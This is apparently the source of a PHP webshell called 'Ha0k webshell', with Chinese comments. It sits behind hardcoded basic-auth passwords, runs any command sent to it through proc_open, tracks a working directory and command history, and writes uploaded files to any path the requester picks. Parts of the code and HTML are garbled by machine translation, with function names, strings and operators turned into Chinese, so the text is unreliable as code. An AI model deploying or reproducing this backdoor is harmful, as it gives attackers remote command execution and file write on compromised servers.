//此处可设置多个用户
$passwd = array('ha0k' => 'ha0k',
'hackerdsb'=>'hackerdsb');
/* 此处设置命令的别名 */
$aliases = array('ls' => 'ipconfig',
'll' => 'ls -lvhF');
if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($_SERVER['PHP_AUTH_PW'])||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
header('WWW-Authenticate: Basic realm="by Ha0k"');
header('HTTP/1.0 401 Unauthorized');
$authenticated = false;
}
else {
$authenticated = true;
/* 开始session */
session_start();
/* 初始化session. */
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd(); //取当前目录
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) { //0表关闭,1表开启,开启时过滤
/* We don't want to add the commands to the history in the
* escaped form, so we remove the backslashes now. */
$_REQUEST['command'] = stripslashes($_REQUEST['command']); //将用addslashes()函数处理后的字符串返回原样
}
/* history */
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) //查找保存数组中的值
unset($_SESSION['history'][$i]); //销毁
array_unshift($_SESSION['history'], $_REQUEST['command']);//array_unshift()函数的作用是在一个数组中插入新的元素。而这个新的数组将被添加到原数组的开头部分。函数最终返回的是插入新元素后的数组。
/* 输出Ha0k# 命令 */
$_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['命令'] 。 “n”;
/* 初始化当前工作目录。 */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd' ] = 目录名(__FILE__); //获取当前所在目录
} elseif (ereg('^[[:blank:]]*cd[[:blank:]] ([^;] )$', $_REQUEST['command'], $ regs)) {
/* 当前命令是一个 'cd' 命令,我们必须将
* 作为内部 shell 命令来处理。 */
if ($regs[1][0] == '/') {
/* 绝对路径,我们不加改动地使用它。 */
$new_dir = $regs[1];
} else {
/* 相对路径,我们将其附加到当前工作
* 目录。 */
$new_dir = $_SESSION['cwd'] . '/' 。 $regs[1];
}
/* 将 '/./' 转换为 '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace( '/./', '/', $new_dir);
/* 将 '//' 转换为 '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', ' /', $new_dir);
/* 将 'x/..' 转换为 '' */
while (preg_match('|/..(?!.)|', $new_dir))
$new_dir = preg_replace(' |/?[^/] /..(?!.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* 尝试更改目录。 */
if (@chdir($new_dir)) { //改变当前目录
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: 无法更改为: $new_dirn";
}
} else {
/* 该命令不是 'cd' 命令,因此我们在
* 更改目录并保存输出后执行它。 */
chdir($_SESSION['cwd']); //改变目录
/* 别名扩展 */
$length = strcspn($_REQUEST['command'], " t"); // 查找t字符串,返回位置
$token = substr($_REQUEST['command'], 0, $length); //取字符串0-t
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['命令'], $length);
$p = proc_open($_REQUEST['command'], // 执行脚本
array(1 => array('pipe', 'w'),
2 => array('管道', 'w')),
$io);
/* 书写书写 */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]), / /转换特殊为HTML字符编码
ENT_COMPAT, 'GB2312');
}
/* 书写 */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]) ),
ENT_COMPAT, 'GB2312');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);//关闭管道
}
}
/* 在JavaScript中构建使用命令历史记录 */
if (empty($_SESSION['history']) ) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';//将搞成字符串
}
}
header( '内容类型:文本/html;字符集=GB2312');
echo '' 。 “n”;
?>
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST[ '远程文件']);
//echo "上传文件成功: " . $HTTP_POST_FILES['用户文件']['名称'];
}
?>
BR>"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" >
<头>
Ha0k webshell var current_line = 0;
var command_hist = new Array();
var 最后 = 0;
功能键(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line command_hist[current_line] = document.shell.command.value;
当前行;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
当前行--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
我们只为正义,为正义而战
;
您未能向 PhpShell 验证自己的身份。您可以href="">重新加载再试一次。
尝试阅读INSTALL如果您在安装 PhpShell 时遇到
问题,请查看此文件。
退出;
}
错误报告(E_ALL);
if (空($_REQUEST['行'])) $_REQUEST['行'] = 10;
?>
当前目录为: <?php echo $_SESSION['cwd'] ?>
;
